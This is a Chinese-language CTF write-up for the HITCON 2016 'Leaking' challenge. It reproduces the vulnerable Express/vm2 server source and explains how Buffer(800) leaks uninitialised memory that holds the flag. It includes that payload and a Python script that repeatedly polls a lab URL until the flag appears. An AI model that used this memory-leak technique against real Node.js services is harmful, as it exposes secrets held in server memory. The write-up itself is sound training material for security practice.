[HITCON 2016]Leaking
"use strict";
var randomstring = require("randomstring");
var express = require("express");
var {
VM
} = require("vm2");
var fs = require("fs");
var app = express();
var flag = require("./config.js").flag
app.get("/", function(req, res) {
res.header("Content-Type", "text/plain");
/* Orange is so kind so he put the flag here. But if you can guess correctly :P */
eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
if (req.query.data && req.query.data.length <= 12) {
var vm = new VM({
timeout: 1000
});
console.log(req.query.data);
res.send("eval ->" + vm.run(req.query.data));
} else {
res.send(fs.readFileSync(__filename).toString());
}
});
app.listen(3000, function() {
console.log("listening on port 3000!");
});
- 根据题目这是一个vm2逃逸
- 主要看这里
eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")
- 这里调用了flag,证明flag会存在于缓存区里面,我们就可以使用Buffer()获取缓冲区的内容从而得到flag
Buffer()
[[沙盒逃逸#Buffer]]
- 在较早一点的node.js版本中 (8.0 之前),当 Buffer 的构造函数传入数字时, 会得到与数字长度一致的一个 Buffer,并且这个 Buffer 是未清零的。8.0 之后的版本可以通过另一个函数 Buffer.allocUnsafe(size) 来获得未清空的内存。
注:关于 Buffer - JavaScript 语言自身只有字符串数据类型,没有二进制数据类型。
- 但在处理像TCP流或文件流时,必须使用到二进制数据。因此在 Node.js中,定义了一个 Buffer 类,该类用来创建一个专门存放二进制数据的缓存区。
- 只要是调用过的变量,一定会存在内存中,所以可以使用Buffer()来读取内存,获取之前调用过的变了数据,比如flag
payload
?data=Buffer(800)
读取一次可能读取不到缓存区的flag
使用脚本
import requests
import time
url="http://a40b5f99-b58f-4d21-b1e9-fcaadab56dd0.node5.buuoj.cn:81/?data=Buffer(800)"
while True:
time.sleep(0.1)
r=requests.get(url=url)
if "flag{" in r.text:
print(r.text)
break
else:
print(r.status_code)